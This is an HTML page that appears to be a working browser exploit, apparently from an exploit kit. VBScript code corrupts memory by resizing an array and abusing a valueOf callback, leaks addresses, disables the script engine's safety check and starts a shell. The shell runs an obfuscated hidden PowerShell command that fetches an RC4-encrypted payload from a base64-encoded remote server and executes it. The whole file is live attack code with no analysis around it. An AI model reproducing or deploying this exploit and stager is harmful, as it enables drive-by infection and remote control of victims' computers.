
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
    <script type="text/vbscript">
        Dim aw
        Dim plunge(32)
        Dim y(32)
        prefix = "%u4141%u4141"
        d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
        b = String(64000, "D")
        c = d & b
        x = UnEscape(c)
        
        Class ArrayWrapper
            Dim A()
            Private Sub Class_Initialize
                  ReDim Preserve A(1, 2000)
            End Sub
            
            Public Sub Resize()
                ReDim Preserve A(1, 1)
            End Sub
        End Class
        
        Class Dummy
        End Class
        
        Function getAddr (arg1, s)
            aw = Null
            Set aw = New ArrayWrapper
        
            For i = 0 To 32
                Set plunge(i) = s
            Next
        
            Set aw.A(arg1, 2) = s
        
            Dim addr
            Dim i
            For i = 0 To 31
                If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
                   addr = strToInt(Mid(y(i), 3 + 4, 2))
                End If
                y(i) = Null
            Next
        
            If addr = Null Then
                document.location.href = document.location.href
                Return
            End If
            getAddr = addr
        End Function
        
        Function leakMem (arg1, addr)
            d = prefix & "%u0008%u4141%u4141%u4141"
            c = d & intToStr(addr) & b
            x = UnEscape(c)
        
            aw = Null
            Set aw = New ArrayWrapper
        
            Dim o
            o = aw.A(arg1, 2)
        
            leakMem = o
        End Function
        
        Sub overwrite (arg1, addr)
            d = prefix & "%u400C%u0000%u0000%u0000"
            c = d & intToStr(addr) & b
            x = UnEscape(c)
        
            aw = Null
            Set aw = New ArrayWrapper
        
        
            aw.A(arg1, 2) = CSng(0)
        End Sub
        
        Function exploit (arg1)
            Dim addr
            Dim csession
            Dim olescript
            Dim mem
        
        
            Set dm = New Dummy
        
            addr = getAddr(arg1, dm)
        
            mem = leakMem(arg1, addr + 8)
            csession = strToInt(Mid(mem, 3, 2))
        
            mem = leakMem(arg1, csession + 4)
            olescript = strToInt(Mid(mem, 1, 2))
            overwrite arg1, olescript + &H174
        Set Object = CreateObject("Wscript.Shell")
        Object.run("cmd.exE   /C"set   BlV=  sEt-itEm  ("{2}{1}{0}"-f 'le:VfZ','iAB','vAR') ( [tYpE]("{0}{7}{2}{6}{5}{1}{4}{3}"-f'Syst','CePOINtm','m.','aGeR','An','t.sERVI','nE','E')  );  ${V8`UCq} =[TYPe]("{1}{2}{0}" -f'nCOdIng','te','xT.e');SeT-iTeM ('va'+'RIabLE'+':x7'+'US6y')  (  [tYpE]("{1}{0}"-f 'oNVERT','c') );  ${3`NK`9I} = [Type]("{0}{4}{3}{2}{1}"-f 'SYSteM','uesT','.webreq','Et','.N') ;  seT-item  ('vArIABLE:0'+'qK'+'X'+'D9') ( [type]("{1}{0}{5}{6}{4}{3}{2}" -f'stEM','sy','cHe','A','ENtiaLc','.ne','t.Cred'));SeT-VarIABlE  ("{0}{1}" -f'sU1','4') (  [TYPE]("{1}{3}{4}{5}{2}{0}" -f 'CODiNg','S','T.En','YS','t','em.Tex')  ) ;If(${psv`E`RSiO`NTAblE}."P`sV`ErsIoN"."m`AjoR" -ge 3){}; ( chIlditEm ("{1}{0}{3}{2}"-f 'rIA','va','lE:vfz','B')).vALUe::"EX`peCT`100`cOnTinUE"=0;${Wc}=^&("{2}{1}{0}"-f 'ct','w-Obje','Ne') ("{1}{2}{0}{3}" -f 'b','S','ystem.Net.We','Client');${U}=(("{8}{11}{1}{10}{9}{6}{5}{2}{7}{4}{3}{12}{0}" -f 'o','lla/5.0','/7','v:11.0) ','; r','OW64; Trident',' W','.0','M','s NT 6.1;',' (Window','ozi','like Geck'));${S`er}=$(  ${V`8U`cQ}::"un`iCO`dE"."g`eT`STrIng"( (GET-VariAbLe ('X7US'+'6Y') -valuEoNlY )::("{2}{0}{1}{3}"-f'Ba','s','From','e64String').Invoke(("{14}{15}{0}{10}{5}{6}{8}{11}{1}{9}{7}{3}{12}{2}{13}{4}"-f 'cAA6AC8ALw','AMQAu','6A','IAM','OAA4ADgA','kAM','gAu','D','AD','A','AxAD','EANgA4AC4','AA','DgA','aAB0AHQ','A'))));${T}=("{0}{1}{3}{2}{4}{5}" -f '/login/','pro','ss','ce','.p','hp');${W`C}."he`AD`ErS".("{1}{0}"-f 'dd','A').Invoke(("{1}{2}{0}" -f'ent','User-A','g'),${u});${Wc}."pRO`Xy"=  ${3n`k`9i}::"dEFa`UltWeB`P`ROxy";${W`c}."pRo`xy"."CRede`Nt`iALs" =   ${0Q`KXd9}::"D`eFa`ULtN`et`w`o`RKcrEDEntIalS";${SCRIPt`:pR`oxy} = ${Wc}."pRo`xy";${k}=  (  DIr  ("{1}{2}{3}{0}"-f'14','V','ARIabl','e:su')).valUe::"aS`cIi".("{2}{0}{1}"-f'etByte','s','G').Invoke((((("{3}{1}{2}{0}{4}" -f'9.','SA^<16*c:0xEY](','utRa',',Oq^^hEovPy','F?Ul'))  -REpLACE'hEo',[ChAR]124)));${R}={${D},${K}=${a`RGs};${s}=0..255;0..255^|^&('%'){${j}=(${J}+${S}[${_}]+${k}[${_}%${K}."CO`UnT"])%256;${s}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]};${d}^|^&('%'){${i}=(${i}+1)%256;${H}=(${H}+${s}[${i}])%256;${S}[${i}],${S}[${h}]=${s}[${H}],${s}[${i}];${_}-bxor${s}[(${s}[${i}]+${s}[${h}])%256]}};${Wc}."hE`Ad`eRS".("{0}{1}" -f'Ad','d').Invoke(("{0}{1}" -f'Cook','ie'),("{1}{7}{8}{6}{11}{5}{3}{10}{9}{0}{4}{2}"-f'zkSuapA','pWL','Vs=','q','CmiY9CP','U','bld','WTQCH','IvYC','0KJ','eyWey','=+'));${dA`TA}=${Wc}.("{3}{0}{2}{1}"-f 'n','adData','lo','Dow').Invoke(${S`ER}+${t});${I`V}=${da`TA}[0..3];${dA`Ta}=${Da`TA}[4..${Da`TA}."l`EN`gtH"];-join[Char[]](^& ${R} ${D`Ata} (${Iv}+${K}))^|.("{1}{0}" -f 'EX','I') && SeT  tpNhI=ecHO  (Gci VAriABLe:E*TEX*).vaLue.iNvokECoMMAnd.InvOKesCriPt(  (GET-ChildiTEM enV:BLV).ValUe )  ^|PowerSHeLL  -nONInTeRaCTiV  -noprofiLE  -ep  BYpaSS -Noe  -wiNdoW  hidDE    - && cmd.exE   /C%tpnhi%"")
        End Function

        Function triggerBug
            aw.Resize()
            Dim i
            For i = 0 To 32
                ' 24000x2 + 6 = 48006 bytes
                y(i) = Mid(x, 1, 24000)
            Next
        End Function
    </script>
        
    <script type="text/javascript">
        function strToInt(s)
        {
            return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
        }
        function intToStr(x)
        {
            return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
        }
        var o;
        o = {"valueOf": function () {
                triggerBug();
                return 1;
            }};
        setTimeout(function() {exploit(o);}, 50);
    </script>
</body>
</html>
